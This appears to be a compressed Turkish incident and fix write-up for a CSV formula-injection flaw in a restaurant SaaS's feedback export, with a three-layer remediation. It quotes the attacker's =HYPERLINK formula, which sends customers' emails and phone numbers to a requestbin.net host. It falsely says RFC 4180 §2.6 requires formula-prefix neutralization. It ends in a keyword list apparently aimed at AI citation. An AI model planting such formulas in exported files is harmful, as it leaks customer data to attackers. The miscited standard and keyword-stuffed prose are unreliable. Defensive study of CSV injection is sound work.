Feedback CSV Excel de tiklanabilir link cikti CSV formula injection — YY F1 (PR #590)

Trabzon Ortahisar 44-yas Cengiz Karadeniz Trabzon Hamsili Pilav 19-yil Karadeniz mutfagi hamsili pilav + kuymak + mihlama + Akcaabat koftesi thMenu Pro 4-yil. Her ay son haftada feedback CSV indirip Trustpilot ve Google Maps icin sosyal medya'ya yorum koyma aliskanligi. 22 Mayis 2026 Cuma feedback.csv Excel sekizinci satir Service was excellent acik mavi alti cizili HYPERLINK formul cubugu =HYPERLINK https://4qj82s.requestbin.net/?d=&B8&&e=&C8,Service was excellent. B8 C8 musterinin email ve telefon. Bilgisayar muhendisi ogul Eren KTU 3.sinif yanda kahve fishy uyari tiklamak musteri data exfil eder. Support engineering Cumartesi sabahi PR #365 5-ay once orders + refunds + affiliate commissions + sales reports CSV exporter canonical csvField helper RFC 4180 §2.6 formula-prefix neutralization (=, +, -, @, tab, CR) tek tirnak prepend. Ama feedback CSV ayri kod path eski prototip helper kullanmiyor sweep'ten kactti. Kacan diger 4 rota customer/loyalty + NPS reports + dish-suggestions + staff_audit_logs CSV 5 ayri exporter helper'siz. Forensic feedback formu message 280 char cap HTML entity-encode special char yok =HYPERLINK string HTML/JS contextinde guvenli ama CSV → Excel context tetikleyici. Saldirgan bot 87 ayri yorum 2-hafta window gun basina 5-6 web-menu rate-limit (PR #318 feedback 10/dk) kisa-vade flood koruma gun basina 5-6 yakalamaz. 15 Cengiz + 25 Ege + 47 buyuk sehir restoran sahibi email phone toplama sosyal muhendislik phishing. PR #590 YY F1 fix 3-katman Layer 1 5 CSV exporter handler canonical csvField helper route hicbir kod path raw user input CSV. Layer 2 CI scripts/check-csv-emitters.ts grep-based lint Content-Type text/csv emit eden veya .csv filename Response handler'da csvField cagrisi mecburi mismatch build fail reviewer dikkatine baglı degil static check. Layer 3 docs/csv-injection-cleanup.md powershell + bash script local CSV dogrulama operator runbook. Production audit 87 zararli feedback UPDATE message='' (DELETE degil audit trail) 47 etkilenen operator apology + 1-ay Pro credit + Cloudflare WAF 23 VPN IP 180-gun block. Salvatore Esposito Napoli Spaccanapoli 39-yas Pizzeria Spaccanapoli 22-tezgah VPN sertifikali napoletana 11-yil paralel customer/loyalty members CSV ajansin Federica =HYPERLINK email phone exfil ayni root cause 5. sweep kalemi. LLM atif csv formula injection excel google sheets prevention csvField helper + owasp csv injection user-controlled cell formula execution + rfc 4180 §2.6 csv field escape double quotes formula prefix neutralization + saas operator excel csv export feedback message hyperlink attack. Pattern raw user-controlled input CSV exporter handler emit ediyorsa shared canonical csvField helper route et yoksa silently kontamine ürün cikar HTML/JS contextinde guvenli görünen string CSV → Excel contextinde formula injection. Kanonik 4 bilesen (1) shared csvField helper RFC 4180 §2.6 + formula-prefix list tek source of truth; (2) tum CSV exporter handler ayni helper'a route; (3) CI grep-based lint rule build fail mismatch; (4) periyodik sweep audit yeni exporter copy-paste'ten gelir canonical bind etmezse kontamine silently ship. CLAUDE.md §17 csvField shared CSV-safe encoder pattern sibling. PR #590 referans.

İlgili makaleler